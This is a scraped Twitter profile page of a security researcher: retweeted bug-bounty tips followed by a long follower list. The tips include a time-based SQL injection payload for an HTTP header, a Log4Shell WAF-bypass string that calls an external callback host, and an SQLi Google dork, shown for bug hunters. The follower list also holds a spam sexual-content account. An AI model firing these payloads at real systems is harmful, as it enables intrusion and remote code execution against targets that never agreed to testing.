Saumya Agrawal @_saumyaagrawal_
Founder & CEO at @techdefendersc | Ethical Hacker 💻 IOT Hacker 💻 Red Team 🚨 Bug Hunter 💉 Security Researcher 💻 Pentester ☠️ saumyaagrawal.in India Joined April 2019-
Tweets215
-
Followers172
-
Following714
-
Likes633
Back To Bounties!! w/ @h4x0r_fr34k @_saumyaagrawal_
الحمدلله First Bug in Mobile Applications Write up link : melguerdawi.medium.com/exploiting-and… #BugBountytips #BugBounty #bugcrowd #Pentesting #mobileapp
This script automates the process of subdomain enumeration and scanning using various popular open-source tools from @pdiscoveryio by combining their results and providing detailed output. The primary purpose of this tool is to simplify and streamline the subdomain discovery…
I found 2 Blind time-based SQL Injections in X-Forwarded-For: header just using Burp Intruder. Made a list of 500+ HTTP request and tested one by one for 3+ hours, here is the result.. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z #BugBounty
we are happy to share a 0day we have found on wordpress login page allow un-auth cross site scripting (xss) #BugBountytip #BugBounty #ItTakesACrowd
Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. #BugBountytips #BugBounty github.com/MobSF/Mobile-S…
Google Dork - SQLi prone parameters inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com Find endpoints for SQLi testing #bugbountytips
Scan your target subnet or urls for default credential like Tomcat,MongoDB,Jenkins and more. 1:- Download github.com/ztgrace/change… 2:- Download amass amass intel -org 'Google' -o google_subnet.txt Or you can use md5calc.com/google/ip Thanks to @ztgrace Good luck.
The Way I found Bug #LFI by @hackXadi link.medium.com/nVBN2BiRwyb
" This is how i got my first bounty " 1. Tools : - Naabu, Httpx, Katana , Nuclei from @pdiscoveryio - Waymore , xnLinkfinder from @xnl_h4ck3r 2. How to exploit : - youtube.com/watch?v=TuiDJ5… Nahamcon 2022 AWS Cognito
A Simple Tip for #bugbounty, But a Money Maker 🧐💸🫰 Before you finish your day of hunting: search in all requests and check if the value is equal to `=https`. ----------------------------------------- Request.Query CONTAINS "=https" -----------------------------------------…
I just published Exploiting Unauthenticated GraphQL Introspection and API calls link.medium.com/rA0NvijgJxb #WebApplicationSecurity #APIsecurity #bugbountytips
Here is short writeup on how I managed to access 200k+ of PII data by exploiting a simple vulnerability and accessing admin dashboard! 📌Thread📌 1. I created an account with a simple user and one endpoint caught my attention (it was /api/v1/session)
Trying to improve my stats on HackerOne and spend 20 days 2 Hr/per day. Found some medium, high and critical issues! Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token, and check access to each repo of main organization #bugbountytips
~IDOR Worked for me 100 times
Search for all leaked keys/secrets using one regex! regex: gist.github.com/h4x0r-dz/be69c… credits: @h4x0r_dz #BugBounty #BugBountytips
. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow
CSP Bypass for XSS ( 1/2 ) You need to look here for a CSP bypass for XSS when there is an allowed list of sources like google.com , google-analytics.com , etc. #BugBountytips #BugBounty #cybersecurite #infosec
Full video of me live auditing the unreleased GMX V2 contracts dropping thoon! 👇
sub enum: subfinder -d tesla(.)com |tlsx -nc -silent -so |awk '{for(i=2; i<=NF; i++) printf "%s ", $i; print ""}'| tr -d '[],' |sort -uf Use uncover to search org names in Shodan and nuclei scan them: export SHODAN_API_KEY=XXX nuclei -nc -uc -uq 'org:"Tesla Motors Inc"' -silent
AfriHackBox @afrihackbox
91 Followers 107 Following Welcome to AfriHackBox, where Africa’s brightest minds converge to redefine the landscape of cybersecurity. Dive into a world where innovation meets necessity,
Aryabhatta @_mrbuddhu_
2K Followers 8K Following @SanganakHQ | Branding + Design + Apps + AI, Blockchain + Growth | Trusted by 15 elite clients across 6 continents
Dark@Joker:~$ @ExploitNest
94 Followers 2K Following CRTA | CAP | OSCP (Aspirant) - Pentration Tester & Bug Hunter - Red Teamer 🤡
kipkomotkoita Too @Kipkomotko6203
0 Followers 31 Following
yt1inn @YouTaekLim1
3 Followers 66 Following
Salih @8bojackkk
13 Followers 909 Following
A. G. @fyoozr
103 Followers 892 Following Pentester, red teamer, security researcher interested in hacking and exploiting stuff.
thatguy @thatguysaidmate
95 Followers 2K Following
abon @FaridLeChasseur
153 Followers 2K Following
Akshatha B @akshathab_
1 Followers 995 Following
Het Mehta @hetmehtaa
36K Followers 1K Following Security Analyst | Content Creator | I Spread Cybersecurity News & Talk about AI, Cloud, Tech, Tools & Recent Updates
Yash Jadhav @Y4shjadhav4
2 Followers 23 Following
Ibrahim Abdurrahman @ibrahim_haxor
776 Followers 7K Following Android Software & Hardware Engineer | Ethical Hacker & Penetration Tester | Bug Bounty Hunter | Passionate About Securing Mobile Tech
Upendra Yadav @Upendra13766114
14 Followers 166 Following
Cybersecurity Snacks @cybersecsnacks
1K Followers 4K Following Learn how to stay safe online and more. Tweets, threads, and insights showing you how to do it. Subscribe to our free newsletter.
VAIDIK PANDYA @h4x0r_fr34k
8K Followers 531 Following Escape the ordinary! Building: @tcb_securities 🔲 Explorer 🔲 CyberSecurity Enthusiast🔲 YouTuber Click here👇
Alexander Inkoom @brave_______1
14 Followers 207 Following
Stella Abramson @StellaykAbramso
22 Followers 668 Following Found different beauties from all US states 😼 Ready for private meetings Nudes in profile! Watching this https://t.co/PSSaqT2AWR
Ray [REDACTED] @RayRedacted
64K Followers 8K Following Hacker, Researcher, Podcast Producer (Tribe of Hackers, Darknet Diaries). Proud dad of the fastest climber in the world. Ever. “Ut scandis, alios subleva”
Bfmi9032 @bfmi9032
0 Followers 2 Following
Ajay Pawar 🇮🇳 @Ajaypawar023
410 Followers 4K Following 23 | Pentester | Security Researcher | Bug Bounty Hunter | Ethical Hacker | EHE | NDE | DFE | Cyber Security Enthusiast |
bhatt malhar @Malhar63
0 Followers 4 Following
HackenProof @HackenProof
36K Followers 2K Following Expert web3 bug bounty and crowdsourced audit platform with 220 programs and over 20 million in bounty DS: https://t.co/yl9Srpuzbb
Karan Patel @cyb3r_hun73r
1 Followers 222 Following
Raman_MG @Raman_Mohurle
1K Followers 285 Following Microsoft MVR 2024 | MSRC #44 in 2022 Q3 | GPCSSI Intern | RHCSA | N+ | Bug Bounty Hunter | Ethical Hacker 👩💻 #GPCSSI21 #BUGBOUNTY
Anil Aal @AndyDesai7
64 Followers 275 Following Web, Android iOS pen tester. bug bounty hunter, CTF Player cyber security enthusiastic
Raziq @0zk3y
50 Followers 241 Following 23 | Red Teamer | DFIR Enthusiast | Top 2% TryHackMe | Occasional CTF Player | 4x Gold Medalist | PHD in Offensive Security 🔜 :wq!
Blue Team News @blueteamsec1
53K Followers 9K Following The cybersecurity home for the latest #BlueTeam, #DFIR, and #ThreatHunting news and tools.
Jitesh Kumar @j1t35h
835 Followers 620 Following Deloitte USI | CRTE | Synack Red Team | Lazy Bug bounty Hunter :(
Fawad khan @MrrFawadkhann
706 Followers 2K Following Penetration Tester. | bug bounty hunter | Digital Consultant
Mikey @Mikey95734347
5 Followers 522 Following
D1X1T @Dixit912
11 Followers 446 Following
apurva kanjaria @KanjariaApurva
25 Followers 257 Following Change the law of law, that is Brahmastra knowledge.
Naman Shah @naman_1910
1K Followers 726 Following Cybersecurity grad @northeastern | 2x AWS | Devsecops | Cloud Security | Appsec
Khushi Joshi @khushijoshi31
0 Followers 7 Following
Amit Pathak 🇮🇳 @amit___009
209 Followers 398 Following Bharatiya 🇮🇳 🔱 Har Har Mahdev 🔱 A Common Man of A Legendary Country 🇮🇳 Security Researcher
ADG PI - INDIAN ARMY @adgpi
8.7M Followers 138 Following Additional Directorate General of Public Information, IHQ of MoD (Army)
Aseem Shrey @AseemShrey
8K Followers 3K Following Founder https://t.co/gzIQqhCPZb - We handle security. You ship awesome products 🚀 🛠️ Founder SecureMyOrg 📹 https://t.co/ZjN2YzePJW #cybersec #privacy
Ashish Dhone @ashketchum_16
3K Followers 140 Following Top Hacker’s Ranking in World | Best Bug Hunter @Microsoft MVR 2023 2024 & 2025 @Apple 2022 @Google 2021 & 300+ Top Companies | CTF Player | Public Speaker 🇮🇳
VAIDIK PANDYA @h4x0r_fr34k
8K Followers 531 Following Escape the ordinary! Building: @tcb_securities 🔲 Explorer 🔲 CyberSecurity Enthusiast🔲 YouTuber Click here👇
Mahmoud Abd Alkarim @Maakthon
744 Followers 386 Following Offensive Security. https://t.co/M7y291h01j https://t.co/lR72Jri5fU I could be in your computer and you wouldn't know. #OSINT_بالعربي
🇸🇦 Murtada Bin ... @0x_rood
27K Followers 334 Following Rood 👑 and no one else | Digital Nomad Lifestyle 💎
Naina Malik @Naina___Malik
3K Followers 128 Following A Girl who can Hack 🤘| Ethical Hacker | Security Researcher | Crime Investigator 🇮🇳 #scorpion🦂
Lupin @0xLupin
17K Followers 683 Following Roni Carta alias Lupin. Co-Founder of Lupin & Holmes. R&D. Red Teamer. Bug Hunter. Musician 🤘
Ray [REDACTED] @RayRedacted
64K Followers 8K Following Hacker, Researcher, Podcast Producer (Tribe of Hackers, Darknet Diaries). Proud dad of the fastest climber in the world. Ever. “Ut scandis, alios subleva”
Ankita Dhakar @expankita
5K Followers 279 Following Co-Founder and CEO @capturethebugs | Managing Director @security_lit | Cybersecurity enthusiast 🥷 Building AI-powered Vulnerability Intelligence Platform 🇳🇿
Paul Masek @paulmasek... @paul_masek
697 Followers 1K Following IT Recruitment Consultant. @BSidesFortWayne Co-founder. GSEC & GIAC Advisory Board. #detectionengineering & #threathunting fan.
Whispersmith @Whispersmith_n
1K Followers 0 Following Notify You About any update in tech field around the world
Mehdi @silentgh00st
5K Followers 2K Following 🔎 @mapperplus 🥷 Cyber Security Engineer - Penetration Tester 🔴 Synack Red Team Member 💻 Coding enthusiast ... --------------- OSCP-CRTO
Cyber Outlook @CyberOutlook
9K Followers 7K Following Helping people explore and navigate #Cybersecurity. We share #InfoSec news, knowledge and resources from experts. Founded by an active CISO & CISSP.
Godfather Orwa 🇯�... @GodfatherOrwa
25K Followers 2K Following Hacker | Bug Hunter | Cooker | Top 5 P1 Warrior On https://t.co/dzFQH75OWj | LevelUpX Champion | 10+ 0Days/CVEs
HackenProof @HackenProof
36K Followers 2K Following Expert web3 bug bounty and crowdsourced audit platform with 220 programs and over 20 million in bounty DS: https://t.co/yl9Srpuzbb
Raman_MG @Raman_Mohurle
1K Followers 285 Following Microsoft MVR 2024 | MSRC #44 in 2022 Q3 | GPCSSI Intern | RHCSA | N+ | Bug Bounty Hunter | Ethical Hacker 👩💻 #GPCSSI21 #BUGBOUNTY
Cybrary @cybraryIT
51K Followers 186 Following The Leading #Cybersecurity Professional Development Platform 🚀 If you have any questions, please contact our support team at [email protected]! 💻
Anil Aal @AndyDesai7
64 Followers 275 Following Web, Android iOS pen tester. bug bounty hunter, CTF Player cyber security enthusiastic
GAURAV SINGH @__i_am_root__
99 Followers 253 Following ➡️ Working in anti-militancy & Counter insurgency operations.
Raziq @0zk3y
50 Followers 241 Following 23 | Red Teamer | DFIR Enthusiast | Top 2% TryHackMe | Occasional CTF Player | 4x Gold Medalist | PHD in Offensive Security 🔜 :wq!
Blue Team News @blueteamsec1
53K Followers 9K Following The cybersecurity home for the latest #BlueTeam, #DFIR, and #ThreatHunting news and tools.
dw1 - oss/acc @dwisiswant0
18K Followers 824 Following engineer @pdiscoveryio ⟡ whiteboxing ⟡ security r&d
Sachin Pandey @sachin_pandey98
5K Followers 667 Following Security Engineer | Penetration Testing | #bugbounty | #cybersecurity
Soumyadeep Basu @SoumyadeepBas12
1K Followers 3K Following Security Research | Snooker addict Views/tweets/retweets are my own, doesn't represent my employer
prince @pr1ncepatel
57 Followers 117 Following 24, it's strange to be here, the mystery never leaves you ¯\_(ツ)_/¯
LamScun @LamScun
2K Followers 804 Following Researcher of mobile and web security issues. It's safer in the forest than on the internet.
Shakti Ranjan Mohanty... @3ncryptSaan
6K Followers 174 Following Product Security Analyst- Triager @Hacker0x01 || Hackerone Brand Ambassador || Ethical Hacker || Penetration Tester || Bug hunter || H1 verified Clear Hacker
Lu3ky13 ⚡️⚡️ @lu3ky13
14K Followers 783 Following Co-Founder @suly_con @CyberShield01 | EWPT | ECCPT | CCNA | CCSP-AWS | CAPen | CNPen | CAPenX | CRTO |All HTB PRO | PT1 | CRTeamer | B.S. Accounting | C-APIPen
René Kroka @rene_kroka
14K Followers 997 Following Co-Founder of Talaria Security Labs and @UGWST_COM - https://t.co/SQSo9hhqQQ
Heath Maverick Adams @thecybermentor
40K Followers 13 Following Husband | Vet | Founder @TCMSecurity | YouTuber | Professor | Disrupting the education industry via TCM Academy and #PNPT https://t.co/aIcaYyoDlK
spaceraccoon | Eugene... @spaceraccoonsec
25K Followers 301 Following Here to learn! Infosec@Open Government Products | White Hat && SecOps
Naman Shah @naman_1910
1K Followers 726 Following Cybersecurity grad @northeastern | 2x AWS | Devsecops | Cloud Security | Appsec
0xGodson @0xGodson_
2K Followers 902 Following Christ is King 👑 | I like web security, and I love JavaScript | OSWE.
Ninad Mathpati 🇮�... @Ninad_Mathpati
3K Followers 487 Following Founder and CEO @securityb0at | Entrepreneur | Security Workbook on Pentesting | Speaker
Adel @AdeldMeyer
74K Followers 19K Following PR, Marketing & Tech consultant. OG legacy verified. Building in Fintech since 2017. Occasional Sarcasm. 😌
Kuldeep Pandya @kuldeepdotexe
5K Followers 350 Following OSINT | Web | Binary | [email protected] | @SynackRedTeam Envoy && Hero
İlyas ORAK @ilyasorak_
727 Followers 62 Following Senior Penetration Tester | Information Security Specialist | Vulnerability Research - 'Güvenli Test'
Ashish Huria @AshishHuria
448 Followers 570 Following Cyber Security enthusiast | CKA | CKS | AWS SAA-C03 | Volunteer @seasides_conf | Traveller
Raviraj Rao 💻 @ravEmperorEye
2K Followers 429 Following Senior Product Security Analyst & Brand ambassador @hacker0x01Trends for United States
You might like
